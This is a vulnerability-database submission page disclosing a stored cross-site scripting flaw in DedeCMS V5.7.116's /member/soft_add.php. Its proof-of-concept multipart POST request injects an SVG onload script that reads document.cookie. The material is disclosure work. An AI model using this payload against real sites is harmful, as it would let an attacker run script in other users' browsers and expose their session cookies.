提出 #453003: DedeCMS V5.7.116 Cross Site Scripting情報

タイトル	DedeCMS V5.7.116 Cross Site Scripting
説明	Summary A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script. This issue allows an attacker to inject malicious scripts into software information pages, potentially compromising the security of the website and its users. Details The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter. An attacker with the ability to register as a member and publish soft can exploit this flaw by injecting malicious scripts into the soft content. These scripts can be executed when other users view the compromised soft. Proof of Concept (POC) POST /member/soft_add.php HTTP/1.1 Host: target-ip Content-Length: 2657 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dopost" save ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="channelid" 3 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="title" test soft ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="tags" test ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="writer" test ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="filetype" .exe ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="language" 简体中文 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softtype" 国产软件 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="accredit" 共享软件 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="os" Win2003,WinXP,Win2000,Win9X ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softrank" 3 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="officialDemo" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="officialUrl" http:// ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softsize" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="unit" MB ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="source" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="typeid" 18 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="needmoney" 0 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="litpic"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dede_addonfields" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="dede_fieldshash" [users'fieldshash] ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="body" <p>asd</p><svg/onload=alert(document.cookie)> ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="softurl1" ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="servermsg1" 本地下载 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr Content-Disposition: form-data; name="picnum" 5 ------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
ソース	⚠️ https://github.com/Hebing123/cve/issues/78
ユーザー	jiashenghe (UID 39445)
送信	2024年11月27日 10:34 (2 年 ago)
モデレーション	2024年12月04日 17:31 (7 days later)
ステータス	承諾済み
VulDBエントリ	286904 [DedeCMS 5.7.116 /member/soft_add.php body クロスサイトスクリプティング]
ポイント	20

◂ 前概要次 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!